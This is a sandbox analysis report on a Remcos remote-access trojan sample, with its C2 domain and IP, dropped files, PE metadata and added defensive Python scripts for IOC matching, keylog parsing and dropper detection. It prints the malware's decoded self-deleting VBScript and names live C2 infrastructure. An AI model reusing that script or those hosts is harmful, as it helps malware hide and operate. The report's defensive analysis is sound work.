Source | Detection | Scanner | Label | Link
luiscaseres.gleeze.com | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
luiscaseres.gleeze.com | 179.15.136.6 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
luiscaseres.gleeze.com | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp/C | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | false | | high
http://geoplugin.net/json.gpj | 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
179.15.136.6 | luiscaseres.gleeze.com | Colombia | | 27831 | ColombiaMovilCO | true
178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
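The domain, URL and IP tables above are the report's network indicators. The following is an added example, not part of the Joe Sandbox report and not Remcos or Joe Sandbox code, that matches those indicators against connection logs: the C2 hostname luiscaseres.gleeze.com (including subdomains), the C2 address 179.15.136.6, and the geoplugin.net/json.gp geolocation request. The JSON-lines record layout, the field names, the private source addresses and the severity weights are assumptions made for the example.

```python
"""Match the network indicators from this report against connection logs.

Added example; neither Joe Sandbox nor Remcos code. The IOC values come
from the report tables; the log records, their field names and the
severity weights are constructed for illustration.
"""
from __future__ import annotations

import ipaddress
import json

# Indicators taken from the report
C2_HOSTS = {"luiscaseres.gleeze.com"}
C2_IPS = {ipaddress.ip_address("179.15.136.6")}
# geoplugin.net is a legitimate geolocation API (reputation "high" in the
# report) that this sample and the related samples query after start-up.
# On its own it is only a weak signal, so it is scored low.
WEAK_URLS = {("geoplugin.net", "/json.gp")}


def classify(rec: dict) -> tuple[str, str] | None:
    """Return (severity, reason) for one log record, or None if nothing matched."""
    host = (rec.get("host") or rec.get("query") or "").lower().rstrip(".")
    if host in C2_HOSTS or any(host.endswith("." + h) for h in C2_HOSTS):
        return "high", f"C2 hostname {host}"
    try:
        dst = ipaddress.ip_address(rec.get("dst", ""))
    except ValueError:            # missing or malformed destination field
        dst = None
    if dst in C2_IPS:
        return "high", f"C2 address {dst}"
    if (host, rec.get("uri", "")) in WEAK_URLS:
        return "low", f"geolocation check {host}{rec['uri']} (weak: benign service)"
    return None


def scan(lines: list[str]) -> list[dict]:
    """Parse JSON-lines log records and return alerts in the order encountered."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        hit = classify(rec)
        if hit:
            alerts.append({"ts": rec.get("ts"), "src": rec.get("src"),
                           "severity": hit[0], "reason": hit[1]})
    return alerts


# Constructed log lines (JSON lines with Zeek-like field names); the source
# addresses, timestamps and the benign fourth record are invented.
SAMPLE_LOG = [
    '{"ts":"2025-01-08T15:00:31Z","src":"10.0.0.21","dst":"10.0.0.2","proto":"dns","query":"luiscaseres.gleeze.com"}',
    '{"ts":"2025-01-08T15:00:32Z","src":"10.0.0.21","dst":"179.15.136.6","proto":"tcp"}',
    '{"ts":"2025-01-08T15:00:33Z","src":"10.0.0.21","dst":"178.237.33.50","proto":"http","host":"geoplugin.net","uri":"/json.gp"}',
    '{"ts":"2025-01-08T15:01:00Z","src":"10.0.0.22","dst":"203.0.113.5","proto":"http","host":"www.example.com","uri":"/"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The low-severity geoplugin hit is deliberately kept rather than dropped: every related sample in the context tables below contacts the same URL, so a geoplugin request from a host that also resolves the C2 hostname is good corroboration, while a geoplugin request on its own is not evidence of infection.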
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586001
Start date and time: 2025-01-08 15:59:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 42
• Number of non-executed functions: 199
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Time | Type | Description
10:01:03 | API Interceptor | 4778409x Sleep call for process: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
179.15.136.6 | 1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe | Get hash | malicious | Remcos | Browse |
179.15.136.6 | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | Get hash | malicious | Remcos | Browse |
178.237.33.50 | 1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | c2.hta | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | c2.hta | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | c2.hta | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | c2.hta | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geoplugin.net | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 4XYAW8PbZH.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATOM86-ASATOM86NL | 1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 9W9jJCj9EV.bat | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse | 178.237.33.50
ColombiaMovilCO | 1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 179.15.136.6
ColombiaMovilCO | 17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 179.15.136.6
ColombiaMovilCO | sh4.elf | Get hash | malicious | Mirai | Browse | 177.252.126.19
ColombiaMovilCO | armv5l.elf | Get hash | malicious | Unknown | Browse | 191.93.155.250
ColombiaMovilCO | Fantazy.x86.elf | Get hash | malicious | Unknown | Browse | 179.12.199.43
ColombiaMovilCO | armv5l.elf | Get hash | malicious | Unknown | Browse | 191.91.160.57
ColombiaMovilCO | kwari.arm.elf | Get hash | malicious | Unknown | Browse | 181.204.131.174
ColombiaMovilCO | 2LDJIyMl2r.exe | Get hash | malicious | Remcos | Browse | 181.71.216.203
ColombiaMovilCO | telnet.ppc.elf | Get hash | malicious | Unknown | Browse | 177.252.126.11
ColombiaMovilCO | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse | 186.181.45.206
                                      No context
                                      No context
Process: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.341257056764204
Encrypted: false
SSDEEP: 3:rgls1MNtlVlFWl5JWRal2Jl+7R0DAlBG45klovDl6v:MlsaNF65YcIeeDAlOWAv
MD5: 8982C1053C33491C738F98E12B8E8EA9
SHA1: 4B6134E2BD46C5369E9BCE5344BC3A7B02E098A5
SHA-256: 6FF3BC51D3896AB08C038E4B893FD5B5D68DECED843F8709B91F726F9B1F3630
SHA-512: 127C5B43C0B68ACFF40AA32CAE7D3FD90AAEEF0A359D6A42B4BA51E96076CADB73BCB7BD449C1FCF13C6F5A3A89FDE10179F9BF57A0C7667FD331B303F714276
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview: ....[.2.0.2.5./.0.1./.0.8. .1.0.:.0.0.:.3.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Preview decoded (the file is UTF-16LE text, shown above with each non-printable byte as a dot; this is the Remcos offline keylogger log at C:\ProgramData\remcos\logs.dat, and the second bracketed line is the title of the foreground window at the time of capture):
[2025/01/08 10:00:31 Offline Keylogger Started]

[Program Manager]
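The dropped logs.dat above is the artefact an incident responder most wants to read, since it records which windows the victim typed into and what was typed. The following is an added example, not part of the Joe Sandbox report and not Remcos code, that decodes such a log and splits it into events. The only format facts taken from the report are that the file is UTF-16LE and that it contains bracketed "[date time event]" and "[window title]" lines; the treatment of any other line as captured keystrokes, the BOM handling and the sample browser window with its keystroke line are assumptions made for the example.

```python
"""Parse a Remcos-style offline keylogger log (UTF-16LE) into events.

Added example, not part of the Joe Sandbox report and not Remcos code.
Format assumptions (only the first two are visible in the logs.dat preview;
the rest is assumed):
  * the file is UTF-16LE text, optionally BOM-prefixed, CRLF line endings
  * "[YYYY/MM/DD HH:MM:SS <event text>]" lines are status events
  * other "[<window title>]" lines name the foreground window that the
    following keystrokes were typed into
  * any remaining text is captured keystrokes
"""
from __future__ import annotations

import re
from dataclasses import dataclass

STATUS_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
WINDOW_RE = re.compile(r"^\[(.+)\]$")


@dataclass
class Event:
    kind: str            # "status", "window" or "keys"
    text: str
    timestamp: str = ""  # only set for status events
    window: str = ""     # foreground window the event belongs to


def decode_logs_dat(raw: bytes) -> str:
    """Decode the UTF-16LE buffer, tolerating a BOM and a truncated last code unit."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    if len(raw) % 2:          # odd length: drop the dangling byte instead of failing
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def parse_keylog(raw: bytes) -> list[Event]:
    """Turn the raw log bytes into an ordered list of events."""
    events: list[Event] = []
    window = ""
    for line in decode_logs_dat(raw).splitlines():
        if not line.strip():
            continue
        m = STATUS_RE.match(line)
        if m:
            events.append(Event("status", m.group(2), timestamp=m.group(1), window=window))
            continue
        m = WINDOW_RE.match(line)
        if m:
            window = m.group(1)
            events.append(Event("window", window, window=window))
            continue
        events.append(Event("keys", line, window=window))
    return events


def keystrokes_by_window(events: list[Event]) -> dict[str, list[str]]:
    """Group captured keystroke lines by the window they were typed into."""
    out: dict[str, list[str]] = {}
    for ev in events:
        if ev.kind == "keys":
            out.setdefault(ev.window, []).append(ev.text)
    return out


# Constructed sample modelled on the report's logs.dat preview; the browser
# window and the keystroke line under it are invented for illustration.
SAMPLE_LOGS_DAT = (
    "\ufeff[2025/01/08 10:00:31 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n"
    "[Login - Mozilla Firefox]\r\n"
    "alice@example.test[Tab]Hunter2[Enter]\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    for ev in parse_keylog(SAMPLE_LOGS_DAT):
        print(f"{ev.kind:7} {ev.timestamp:19} {ev.window!r:28} {ev.text}")
```

One limitation worth knowing before trusting the output: a keystroke line that consists only of a bracketed special key (for example a line that is just "[Enter]") is indistinguishable from a window title under these rules, so when the parser reports an implausible window name, check the raw bytes.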
Process: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.019205124979377
Encrypted: false
SSDEEP: 12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
MD5: B62617530A8532F9AECAA939B6AB93BB
SHA1: E4DE9E9838052597EB2A5B363654C737BA1E6A66
SHA-256: 508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
SHA-512: A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
Malicious: false
Reputation: low
Preview: {. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
File Type: data
Category: dropped
Size (bytes): 788
Entropy (8bit): 3.613846532314634
Encrypted: false
SSDEEP: 12:xQ4lA2++ugypjBQMPURRRNl8gdPX9xKlNfSOG4Q3DwRNl8gdPX9xKlNfSOG49Hzk:7a2+SDG+vOltQTP+vOlt9Aait
MD5: A702D08025293B9446AB9EC0C66709D3
SHA1: 1FD7AEABE22C07A61864F1DB96A1ED7F09B75676
SHA-256: EEF3857FC97BBB7025AE34CBE0EC597FA551BB29403DB16A51D25486D270D94D
SHA-512: 18E5DF33717A183DB36451A62A7C299A47FE42F7024DAFA5FB99DE67CCBF10CEB3B5E5138DE82937AF515684B0CBEEE0155688B687C2FE0303E0A02A42E70270
Malicious: true
Reputation: low
Preview: O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.D.e.s.k.t.o.p.\.1.7.3.6.3.4.8.2.2.4.7.f.6.0.1.3.3.f.0.1.3.d.6.2.a.a.e.3.8.c.5.3.1.a.c.9.5.b.b.5.5.a.2.0.0.a.2.4.3.b.0.e.1.5.f.a.7.c.f.8.e.8.9.2.3.b.2.a.1.0.5.9.0.f.9.5.2...d.a.t.-.d.e.c.o.d.e.d...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.D.e.s.k.t.o.p.\.1.7.3.6.3.4.8.2.2.4.7.f.6.0.1.3.3.f.0.1.3.d.6.2.a.a.e.3.8.c.5.3.1.a.c.9.5.b.b.5.5.a.2.0.0.a.2.4.3.b.0.e.1.5.f.a.7.c.f.8.e.8.9.2.3.b.2.a.1.0.5.9.0.f.9.5.2...d.a.t.-.d.e.c.o.d.e.d...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
Preview decoded (UTF-16LE VBScript; this is the self-deletion script behind the "Deletes itself after installation" and "WScript or CScript Dropper" signatures):
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\hubert\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe")
fso.DeleteFile "C:\Users\hubert\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"
wend
fso.DeleteFile(Wscript.ScriptFullName)
The loop retries the delete until the original executable is gone, which only succeeds once the process that launched the script has exited and released the file; the script then removes itself via Wscript.ScriptFullName, so neither the dropper nor the script remains on disk. Note that the script hard-codes the sample's path under C:\Users\hubert\Desktop, whereas process paths elsewhere in this report appear under C:\Users\user.
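The self-deletion script above is short enough to fingerprint directly: FileSystemObject, a FileExists/DeleteFile busy loop against an executable and a final DeleteFile of Wscript.ScriptFullName. The following is an added example, not part of the Joe Sandbox report and not Remcos code, that scores a VBScript on that combination and extracts the paths it tries to remove. The indicator set, the verdict rule, the directory scan helper and both sample scripts are assumptions made for the example; the malicious sample is the decoded script from the report with the long sample name shortened to sample.exe.

```python
"""Flag VBScript droppers that wait for a binary to disappear and then delete
themselves, as the script dropped by this sample does.

Added example; not code from the report or from Remcos. Indicator names,
the verdict rule and the path pattern are assumptions for illustration.
"""
from __future__ import annotations

import re
from pathlib import Path

INDICATORS = {
    "fso":         re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "exists_loop": re.compile(r'\bwhile\s+\w+\.FileExists\(', re.I),
    "delete":      re.compile(r'\.DeleteFile\b', re.I),
    "self_delete": re.compile(r'\.DeleteFile\s*\(?\s*Wscript\.ScriptFullName', re.I),
    "on_error":    re.compile(r'\bOn Error Resume Next\b', re.I),
}
# Quoted absolute paths to executable content; assumption, extend per environment
TARGET_RE = re.compile(r'"([A-Za-z]:\\[^"]+\.(?:exe|dll|scr|bat|cmd))"', re.I)


def load_script(data: bytes) -> str:
    """The VBS dropped by this sample is UTF-16LE; fall back to 8-bit for plain files."""
    if data.startswith(b"\xff\xfe") or (len(data) > 1 and data[1:2] == b"\x00"):
        return data.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    return data.decode("latin-1")


def analyse(script: str) -> dict:
    """Return per-indicator hits, the paths the script deletes, and a verdict."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    targets = sorted(set(TARGET_RE.findall(script)))
    # Core of the pattern: delete-in-a-loop plus self-removal; On Error and the
    # FSO creation are supporting evidence only, since benign scripts use both.
    verdict = hits["exists_loop"] and hits["delete"] and hits["self_delete"]
    return {"indicators": hits, "targets": targets, "self_delete_dropper": verdict}


def scan_directory(root: Path) -> dict[str, dict]:
    """Return {path: analysis} for every *.vbs under root that matches the pattern."""
    findings: dict[str, dict] = {}
    for p in root.rglob("*.vbs"):
        res = analyse(load_script(p.read_bytes()))
        if res["self_delete_dropper"]:
            findings[str(p)] = res
    return findings


# Constructed samples: the decoded script from the report (sample.exe stands
# in for the long sample name) and a benign cleanup script that must not trigger.
MALICIOUS_VBS = (
    'On Error Resume Next\r\n'
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'while fso.FileExists("C:\\Users\\hubert\\Desktop\\sample.exe")\r\n'
    'fso.DeleteFile "C:\\Users\\hubert\\Desktop\\sample.exe"\r\n'
    'wend\r\n'
    'fso.DeleteFile(Wscript.ScriptFullName)\r\n'
).encode("utf-16-le")

BENIGN_VBS = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'If fso.FileExists("C:\\Temp\\old.log") Then fso.DeleteFile "C:\\Temp\\old.log"\r\n'
).encode("ascii")

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_VBS), ("benign", BENIGN_VBS)):
        print(name, analyse(load_script(blob)))
```

Run scan_directory over %TEMP% and the user's profile on a suspect host; the report's Sigma hits ("Script Interpreter Execution From Suspicious Folder", "Suspicious Script Execution From Temp Folder") point at exactly those locations, and the extracted target path tells you which binary the dropper was covering for.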
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.586726337588914
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
File size: 493'056 bytes
MD5: fa48843ce9a50a4bc84f6996923b7a27
SHA1: 29df9451a5aae33ddca11c26163d1c276bf2ca65
SHA256: 311df69d6714a0736be9908da11fa4c544a542ba4f9c99a314e727b321a80cd7
SHA512: d1f1d6b6268bf020319ca282483df3b8c05f28993f88faf04b0d26c4db5244a260c435784f93e2c6374879ef657465035b734e4cb71870c53934923a653d2722
SSDEEP: 12288:f9PgP3HAMwIGjY4vce6lnBthn5HSRVMf139F5woxr+IwtHwBtFhCsvZD5q+P32:943HfwIGYMcn5PJrZU+
TLSH: 21A4BE01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.
Icon Hash: 95694d05214c1b33
Entrypoint: 0x433b4a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x6752B172 [Fri Dec 6 08:10:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: e77512f955eaf60ccff45e02d69234de
                                      Instruction
                                      call 00007F7378B42B43h
                                      jmp 00007F7378B4249Fh
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000324h
                                      push ebx
                                      push 00000017h
                                      call 00007F7378B64979h
                                      test eax, eax
                                      je 00007F7378B42627h
                                      mov ecx, dword ptr [ebp+08h]
                                      int 29h
                                      push 00000003h
                                      call 00007F7378B427E4h
                                      mov dword ptr [esp], 000002CCh
                                      lea eax, dword ptr [ebp-00000324h]
                                      push 00000000h
                                      push eax
                                      call 00007F7378B44AFBh
                                      add esp, 0Ch
                                      mov dword ptr [ebp-00000274h], eax
                                      mov dword ptr [ebp-00000278h], ecx
                                      mov dword ptr [ebp-0000027Ch], edx
                                      mov dword ptr [ebp-00000280h], ebx
                                      mov dword ptr [ebp-00000284h], esi
                                      mov dword ptr [ebp-00000288h], edi
                                      mov word ptr [ebp-0000025Ch], ss
                                      mov word ptr [ebp-00000268h], cs
                                      mov word ptr [ebp-0000028Ch], ds
                                      mov word ptr [ebp-00000290h], es
                                      mov word ptr [ebp-00000294h], fs
                                      mov word ptr [ebp-00000298h], gs
                                      pushfd
                                      pop dword ptr [ebp-00000264h]
                                      mov eax, dword ptr [ebp+04h]
                                      mov dword ptr [ebp-0000026Ch], eax
                                      lea eax, dword ptr [ebp+04h]
                                      mov dword ptr [ebp-00000260h], eax
                                      mov dword ptr [ebp-00000324h], 00010001h
                                      mov eax, dword ptr [eax-04h]
                                      push 00000050h
                                      mov dword ptr [ebp-00000270h], eax
                                      lea eax, dword ptr [ebp-58h]
                                      push 00000000h
                                      push eax
                                      call 00007F7378B44A71h
                                      Programming Language:
                                      • [C++] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e020 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x4b40 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b000 | 0x3b88 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6c510 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6c5e8 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6c548 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x57000 | 0x4f4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x55f2d | 0x56000 | c9fb1fecb5f01a3c88e2bc00eccd57c4 | False | 0.5739377043968024 | data | 6.621523378040251 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
